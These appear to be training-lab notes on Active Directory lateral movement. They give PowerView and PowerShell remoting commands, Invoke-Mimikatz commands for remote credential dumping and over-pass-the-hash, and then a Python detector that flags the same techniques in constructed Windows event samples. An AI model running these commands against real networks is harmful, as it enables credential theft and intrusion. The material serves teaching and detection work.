# Lateral Movement

## PowerView

```powershell
# Dot-source PowerView so its functions are available in the current session
. .\PowerView.ps1


# Find machines where the current user has local admin access
Find-LocalAdminAccess


# Start an interactive PowerShell session on a server
Enter-PSSession -ComputerName <FQDN OF SERVER WITH ADMIN ACCESS>
whoami
whoami /priv
hostname


# Use different credentials (prompts for the password):
Enter-PSSession -ComputerName <FQDN OF SERVER WITH ADMIN ACCESS> -Credential <domain>\<username>


# Create a stateful session (New-PSSession returns the session object; Enter-PSSession only attaches to one)
$sess = New-PSSession -ComputerName <FQDN OF SERVER WITH ADMIN ACCESS>
# See the session
$sess
# Enter the session
Enter-PSSession -Session $sess
# Exit the session
exit
```

### Executing Commands Remotely

```powershell
# Execute a command on a remote target where you have local admin access
Invoke-Command -ComputerName <FQDN OF SERVER WITH ADMIN ACCESS> -ScriptBlock {whoami; hostname}
Invoke-Command -ComputerName <FQDN OF SERVER WITH ADMIN ACCESS> -ScriptBlock {Get-Process}


# Execute a script file on each server listed in a file (one hostname per line)
Invoke-Command -FilePath C:\scripts\Get-PassHashes.ps1 -ComputerName (Get-Content <list_of_servers>)


# Execute a locally loaded function on the remote machines:
Invoke-Command -ScriptBlock ${function:Get-PassHashes} -ComputerName (Get-Content <list_of_servers>)


# Same, but passing arguments. Keep in mind that only positional arguments can be passed this way:
Invoke-Command -ScriptBlock ${function:Get-PassHashes} -ComputerName (Get-Content <list_of_servers>) -ArgumentList <arg1>,<arg2>


# Execute "stateful" commands using Invoke-Command (variables persist across calls in the same session):
$Sess = New-PSSession -ComputerName Server1
Invoke-Command -Session $Sess -ScriptBlock {$Proc = Get-Process}
Invoke-Command -Session $Sess -ScriptBlock {$Proc.Name}
```

### Invoke-Mimikatz

```powershell
# Dump credentials on the local machine.
Invoke-Mimikatz -DumpCreds


# Dump credentials on multiple remote machines.
Invoke-Mimikatz -DumpCreds -ComputerName @("sys1","sys2")


# Invoke-Mimikatz uses the PowerShell remoting cmdlet Invoke-Command to do the above.


# "Over pass the hash": generate tokens from hashes.
Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:dollarcorp.moneycorp.local /ntlm:<ntlmhash> /run:powershell.exe"'
```
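From the defender's side, the techniques above leave a predictable trail: script block logging (PowerShell/Operational event 4104) records the remoting cmdlets and the mimikatz command strings, and the receiving host spawns `wsmprovhost.exe` (Security event 4688) to host the inbound session. The detector below is an added example, not part of the original notes; the event records it runs over are constructed samples in a simplified field layout, and the indicator list is an assumption drawn from the commands on this page.

```python
"""Flag PowerShell-remoting lateral movement in Windows event records.

Constructed example: SAMPLE_EVENTS are hand-made records mimicking the
fields of PowerShell 4104 and Security 4688 events, not real logs.
"""
import re
from dataclasses import dataclass

# Indicators assumed from the commands shown on this page.
SUSPICIOUS_SCRIPT = re.compile(
    r"Invoke-Mimikatz|sekurlsa::|Get-PassHashes|Find-LocalAdminAccess", re.IGNORECASE)
REMOTING_CMDLETS = re.compile(
    r"\b(Invoke-Command|Enter-PSSession|New-PSSession)\b", re.IGNORECASE)


@dataclass
class Finding:
    host: str
    event_id: int
    reason: str


def analyse(events):
    """Return one Finding per event that matches a lateral-movement pattern."""
    findings = []
    for ev in events:
        eid, host = ev["EventID"], ev["Computer"]
        if eid == 4104:  # script block logging: full text of executed code
            text = ev.get("ScriptBlockText", "")
            if SUSPICIOUS_SCRIPT.search(text):
                findings.append(Finding(host, eid, "credential-theft tooling in script block"))
            elif REMOTING_CMDLETS.search(text) and "-ComputerName" in text:
                findings.append(Finding(host, eid, "remoting cmdlet targeting other hosts"))
        elif eid == 4688:  # process creation on the receiving host
            proc = ev.get("NewProcessName", "").lower()
            if proc.endswith("\\wsmprovhost.exe"):
                findings.append(Finding(host, eid, "WinRM-hosted PowerShell (inbound remoting)"))
    return findings


SAMPLE_EVENTS = [  # constructed
    {"EventID": 4104, "Computer": "ws01.corp.local",
     "ScriptBlockText": "Invoke-Command -ComputerName srv01 -ScriptBlock {whoami}"},
    {"EventID": 4688, "Computer": "srv01.corp.local",
     "NewProcessName": "C:\\Windows\\System32\\wsmprovhost.exe"},
    {"EventID": 4104, "Computer": "srv01.corp.local",
     "ScriptBlockText": "Invoke-Mimikatz -DumpCreds"},
    {"EventID": 4104, "Computer": "ws02.corp.local",
     "ScriptBlockText": "Get-Process | Sort-Object CPU"},  # benign
]

if __name__ == "__main__":
    for f in analyse(SAMPLE_EVENTS):
        print(f"{f.host}  {f.event_id}  {f.reason}")
```

Correlating the 4104 on the source with the 4688 on the destination within a short window is what turns three isolated hits into one lateral-movement chain.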
